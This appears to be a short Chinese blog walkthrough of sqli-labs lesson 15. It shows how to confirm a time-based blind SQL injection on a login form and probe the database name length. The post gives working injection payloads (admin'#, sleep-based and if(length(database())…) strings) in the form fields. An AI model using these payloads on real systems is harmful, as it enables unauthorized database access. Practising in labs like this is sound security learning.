(1)无论输入什么都没有回显,但是输入 admin'# 时会显示成功登录,说明闭合方式是单引号

SQLI DUMB SERIES-15 随笔 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

(2)无回显,则使用盲注,可用用时间延迟攻击法。

测试时间延迟是否可行:

uname=admin' and sleep(5) #&passwd=&submit=Submit

有明显延迟,测试成功。

(3)手工延迟注入与前面的手工注入相同,如爆库名

uname=admin' and if(length(database())=8,sleep(7),1)#&passwd=&submit=Submit

 SQLI DUMB SERIES-15 随笔 第2张

有明显延迟,说明库名为8位。
扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄